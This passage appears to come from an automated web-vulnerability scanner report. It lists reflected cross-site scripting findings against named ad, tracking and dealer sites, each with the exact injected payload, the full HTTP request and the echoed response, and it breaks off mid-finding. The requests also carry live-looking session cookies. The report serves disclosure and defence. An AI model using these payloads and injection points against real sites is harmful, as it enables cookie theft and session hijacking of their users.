This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=3005693&c3=3&c4=http%3A%2F%2Falltop.com%2F&c5=&c6=2bbdc<script>alert(1)</script>53129e2fbb3&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://law.alltop.com/widget2fa3b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3c139cf78b0/?type=js
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=167523a-24.143.206.177-1301787521

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 23 Apr 2011 13:51:14 GMT
Date: Sat, 16 Apr 2011 13:51:14 GMT
Connection: close
Content-Length: 3607

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"3005693", c3:"3", c4:"http://alltop.com/", c5:"", c6:"2bbdc<script>alert(1)</script>53129e2fbb3", c10:"", c15:"", c16:"", r:""});


4.26. http://cas.ny.us.criteo.com/delivery/afr.php [did parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.ny.us.criteo.com
Path:   /delivery/afr.php

Issue detail

The value of the did request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f81e5'style%3d'x%3aexpression(alert(1))'7563c489890 was submitted in the did parameter. This input was echoed as f81e5'style='x:expression(alert(1))'7563c489890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /delivery/afr.php?zoneid=15066&bannerid=37112&did=156505f45df81e5'style%3d'x%3aexpression(alert(1))'7563c489890&rtb=5&z=Tar60gAHR30K5X_Nloo_2GL3qxoxX1hsFewpCw&b=_9%252f8RilNQuVmVpyvNO2WVQg%253d%253d&u=|QmCyCf/O7hL8fisSJvUOqKLBu3umSoU3sekQ5udTqrY=|&bi=|QmCyCf/O7hJlodhOLNsrwMA/kTEKxx+G6iE3+w8k9mtjbRxt/u2NAg==|&rl=~02-DC9C20D512FA751C4712D31356EF1781B34849CF-a-q-c-103--2-1-~&ep=%7cQmCyCf%2fO7hKYMkLPH4Veoi9%2bda57p3x3sVmFbD27DgeErQnbGjoFg9GtCrd0q81l%7c&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5eg20vqqTf2OHc3_lQfY_6i0CaKBnoQCoqHByxOShdTVSQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MzE1NTc4NDYwMjUxNDIzoAGs3f7oA7IBEHd3dy5oYWJlci5nZW4udHK6AQozMDB4MjUwX2FzyAEJ2gFdaHR0cDovL3d3dy5oYWJlci5nZW4udHIvZWRpdGFjN2ZkJTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoJTIySURJT1QlMjIpJTNDL3NjcmlwdCUzRTA1NTA0MTUzNzdimAL6FcACBcgCrMKrDqgDAfUDAAAAxIAGuoH4hfPs5YdV%26num%3D1%26sig%3DAGiWqtzGyfAoAR666KFrrSATBBfN92A9aw%26client%3Dca-pub-5315578460251423%26adurl%3D&prlog= HTTP/1.1
Host: cas.ny.us.criteo.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5315578460251423&format=300x250_as&output=html&h=250&w=300&lmt=1303068963&channel=2159340635&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fwww.haber.gen.tr%2Fincludes_yeni%2Fmynet3.htm&color_bg=FBFBFB&color_border=FFFFFF&color_link=45546B&color_text=000000&color_url=7CA415&flash=10.2.154&url=http%3A%2F%2Fwww.haber.gen.tr%2Feditac7fd%2522%253E%253Cscript%253Ealert(%2522IDIOT%2522)%253C%2Fscript%253E0550415377b&dt=1303050963570&bpp=1&shv=r20110406&jsv=r20110412&prev_fmts=300x250_as&prev_slotnames=8756608441&correlator=1303050928025&frm=0&adk=3471477028&ga_vid=1891209206.1303050928&ga_sid=1303050928&ga_hid=1373877376&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=973&eid=33895132&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=3&dtd=161&xpc=f3SeV9FlEk&p=http%3A//www.haber.gen.tr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=ce48fc77-7599-4968-ae07-b1daf0463305; udc=*1PvotshjACjE74y20GwJvMA%3d%3d; udi=*15Fg%2b59W72YO0jpuTCiAJmQ%3d%3d; evt=*1YsJhcuZCSxoABQmXXWsOhR6uR3kIaBebvD6nwBJjjMY%3d; uic=*13H%2bAu%2bmG%2bChk8ggPbwnxkrQQ8Z17refXkYQu8eEU0fjeU%2fwLAHgNvhAiUG5QHNRj; dis=*12VWxXL1XaY1S9qvptFGQ7eAFRgw3i%2f%2bqtoIw3HzTj6ZMNuZlx6reINde4n7jPnAtZHWPtxCQPit16SZIkJNjGbu3LVUe3SUbdPsTn810eu5Eg1Rr1SF2zO9v%2bIakpFEkr%2bPx0gATCXaWun21B3PL5FeHd%2fxvSWhFldH0vbsgy%2fjKLco2gd2a5xR193L12noCPAD7a1A1WCUXWB5MnqCocdHz1zFhXaIYlFa%2feL8MeiewBP8i72W2Smo0B7dbOvaj4YQIwkmx%2bhWQJmM6a61%2f6P4XxxBbQzGrV4lLZk%2b0CXo8UaasIzysyNgVO5K%2fiDY29YyWJ%2ffsAElIhASNXkl7UXX6WTF11Uq9Y8kPvtt9giDoeJ%2bU90ABpHszulWVQwQ30hSjgW%2fh8kliCaB0pN58UTJ8qtpgQQmEc6kDASwS7xhIPYqdwcb%2fRd5FyC2pFqEy

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private, max-age=0, no-cache
Content-Type: text/html; charset=utf-8
P3P: CP='CUR ADM OUR NOR STA NID'
Date: Sun, 17 Apr 2011 14:36:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: OAID=ce48fc7775994968ae07b1daf0463305; expires=Sun, 17-Apr-2016 14:36:10 GMT; path=/
Set-Cookie: udc=*13TYb407Nzn0ZH0Euz4UNtr9IsYUzbQITxUUULDLNmxZrzU%2fJ4gv%2fKlT6SKc05zuUvATSRvsw4b7TlyeQBoz1tuInb68k5ZYQ6P%2bZbSbdMTnMpG%2fUUAYABL%2fOjZdgNl%2fj1yYrlvJzVkyoSKgWFtCs4Dqpt7mJOo%2bqs5KBIyVS26c7WVJ1y6uhRTIzTLdaqwKgd6OY2P6jSrkZKY7xviAYiVuQbaKa3mvNqVmNBYtOh5wBJaP%2b2FWIxhj6mVOaLreP2ofbbEBmTXdBAofksnjZWg7eVzZOcKd%2b7sKZ4Lz8bKYP%2f3RTv3U2R3pumJE60%2bcg8ZdcXlBIGSJbKkjyIqjViftjM42kg1KotFLgmAlwmdXyxuOu4bd3QN92nCjulqUAdmotUPcIM7JdWjAC8mGD%2fCgK8XXhL4%2bdYF9kZnZw%2b0iSqbOhighXQzAcefoRjVZRlnkIUaGtVBaFMoR1r0lgyoDGgQzyRV%2b8Zs7N2l6KYNWfvAm3QPVWxio%2fzk2GdVdQ6qKA42XdYzPYY4iOYegdExE4%2bL0GiQKg%2bqbdrJufvWfj1xwnbX%2fMnTQmFyn3zUqhThDF9wGbiiDmWlXdZZYABw%3d%3d; domain=.criteo.com; expires=Mon, 17-Oct-2011 14:36:10 GMT; path=/
Set-Cookie: udi=*1kLYehFfAa6GMU2HG2byvAQ%3d%3d; domain=.criteo.com; expires=Mon, 18-Apr-2011 14:36:10 GMT; path=/
Set-Cookie: OACBLOCK=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OACCAP=; expires=Tue, 17-May-2011 14:36:10 GMT; path=/
Set-Cookie: OASCCAP=; path=/
Content-Length: 6109

<html>
<head>
<title>Advertisement</title>
</head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<div
...[SNIP]...
<iframe id='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' name='if156505f45df81e5'style='x:expression(alert(1))'7563c489890' width='1px' height='1px'>
...[SNIP]...
4.27. https://cc.dealer.com/views/forgot-password [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the HTML document as plain text between tags. The payload dd839<script>alert(1)</script>5d9f0f94bb2 was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3Edd839<script>alert(1)</script>5d9f0f94bb2&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:56 GMT
Connection: keep-alive
Set-Cookie: ssoid=6370550540463812016995a2e0336b5c;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 4059

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
</script>dd839<script>alert(1)</script>5d9f0f94bb2/login_graphic.png?0) no-repeat;
    width: 489px;
    height: 330px;
   }

   * html #loginBox{
       padding-top: 80px;
       padding-left: 0px;
   }

   #loginBox table {
       padding-left: 50px;
       padding-right: 65
...[SNIP]...
4.28. https://cc.dealer.com/views/forgot-password [reseller parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cc.dealer.com
Path:   /views/forgot-password

Issue detail

The value of the reseller request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539c4"><script>alert(1)</script>aad2fd6705e was submitted in the reseller parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/forgot-password?reseller=539c4"><script>alert(1)</script>aad2fd6705e&lang=en_US HTTP/1.1
Host: cc.dealer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerCC5Pool=2650869258.20480.0000; BIGipServerSecureCC5Pool=2650869258.20736.0000; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; ssoid=6124c450404638d30061b29f82e6d54d; JSESSIONID=giphhm46cleri

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:29:54 GMT
Connection: keep-alive
Set-Cookie: ssoid=63704c0b40463812016995a2a1a75473;path=/;domain=.dealer.com
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache
Content-Length: 3955

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
   <title>Dealer.com Forgot Username/Password</title>

<style type="text/css">
   body{
       margin:0;
       padding:0;
       over
...[SNIP]...
<a href="/views/login?reseller=539c4"><script>alert(1)</script>aad2fd6705e" border="0">
...[SNIP]...
4.29. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84deb'-alert(1)-'cf4a7bdb388 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:47 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:47 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:47 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=24484deb'-alert(1)-'cf4a7bdb388&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.30. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfcd5'-alert(1)-'d944e6c89e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 236
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro&dfcd5'-alert(1)-'d944e6c89e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.31. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43d5f'-alert(1)-'d2ee4501071 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://housecall.trendmicro.com/us/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 12:56:48 GMT
Server: Apache/2.2.9
Expires: Sun, 17 Apr 2011 13:26:48 GMT
Last-Modified: Sun, 17 Apr 2011 12:56:48 GMT
Content-Length: 234
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=trend_micro43d5f'-alert(1)-'d2ee4501071';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
4.32. http://ds.addthis.com/red/psi/sites/www.staysafeonline.org/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.staysafeonline.org/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ad9dc<script>alert(1)</script>c211f103512 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.staysafeonline.org/p.json?callback=_ate.ad.hprad9dc<script>alert(1)</script>c211f103512&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.staysafeonline.org%2Fcontact&ref=http%3A%2F%2Fwww.staysafeonline.org%2F&xls06r HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1302905826.1FE|1302905826.60|1302905826.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 451
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 12:53:49 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 12:53:49 GMT; Path=/
Set-Cookie: di=%7B%7D..1303044829.1FE|1303044829.60|1303044829.66; Domain=.addthis.com; Expires=Tue, 16-Apr-2013 12:53:48 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 12:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 12:53:49 GMT
Connection: close

_ate.ad.hprad9dc<script>alert(1)</script>c211f103512({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.staysaf
...[SNIP]...
4.33. http://ds.addthis.com/red/psi/sites/www.webroot.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.webroot.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 41b69<script>alert(1)</script>b9cd18d7e21 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.webroot.com/p.json?callback=_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fbusiness-antispyware-ce.html&ref=http%3A%2F%2Fburp%2Fshow%2F26&1vvglw8 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1303044828.1FE|1303044828.60|1303044865.66; dt=X; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 17 Apr 2011 13:20:04 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 17 May 2011 13:20:04 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 17 Apr 2011 13:20:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 17 Apr 2011 13:20:04 GMT
Connection: close

_ate.ad.hpr41b69<script>alert(1)</script>b9cd18d7e21({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})
4.34. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 9776c<script>alert(1)</script>af634ea0b3b was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.martindale.com%2Fall%2Fc-england%2Fall-lawyers-3.htm%3Fc%3DN&uid=ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b&xy=0%2C0&wh=160%2C600&vchannel=76289&cid=151354&iad=1302961744905-1937990565784275&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/martindale.lawyer.locator.dart/ll_cpm_skyscraper;sz=160x600;ord=3737712935544550400?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=f316e322-42df-4ab5-ad2c-53028d5d34aa

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=ABA01A6D8C5302184EC9B5B48A58FCC8; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sat, 16 Apr 2011 13:49:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_3216119776c<script>alert(1)</script>af634ea0b3b");
4.35. http://feeds.feedburner.com/~s/hadash-hot [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /~s/hadash-hot

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba601"%3balert(1)//a740d68a772 was submitted in the i parameter. This input was echoed as ba601";alert(1)//a740d68a772 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~s/hadash-hot?i=http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601"%3balert(1)//a740d68a772 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.hadash-hot.co.il/login.php?return=/submit.php?69123%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Efab6770260=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 17 Apr 2011 14:35:06 GMT
Expires: Sun, 17 Apr 2011 14:35:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 743

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
ner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/hadash-hot?i='+escape("http://www.hadash-hot.co.il/login.php?return=/submit.php?69123ba601";alert(1)//a740d68a772")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...
4.36. http://googlev8.dealer.com/smgmap.htm [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 230ed"><script>alert(1)</script>8066f9184f8 was submitted in the locale parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smgmap.htm?accountId=automastermercedesbenz&locale=en_US230ed"><script>alert(1)</script>8066f9184f8 HTTP/1.1
Host: googlev8.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.theautomastermercedesbenz.com/dealership/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse,CookieSet
Vary: Accept-Encoding
Date: Sat, 16 Apr 2011 17:16:00 GMT
Connection: close
Set-Cookie: ssoid=5f5015bb0a0a0003004764a11aea3255;path=/;domain=.dealer.com
Set-Cookie: ddcpoolid=CmsPoolGoogleV8;path=/;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 2962

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms19.dealer.ddc p7072 -->

   <title>Google Maps</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859
...[SNIP]...
<body class="honda enUS230ed"><script>alert(1)</script>8066f9184f8">
...[SNIP]...
4.37. http://googlev8.dealer.com/smgmap.htm [locale parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://googlev8.dealer.com
Path:   /smgmap.htm

Issue detail

The value of the locale request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b9af'%3balert(1)//722916ad0cd was submitted in the locale parameter. This input was echoed as 1b9af';alert(1)//722916ad0cd in the application's response.

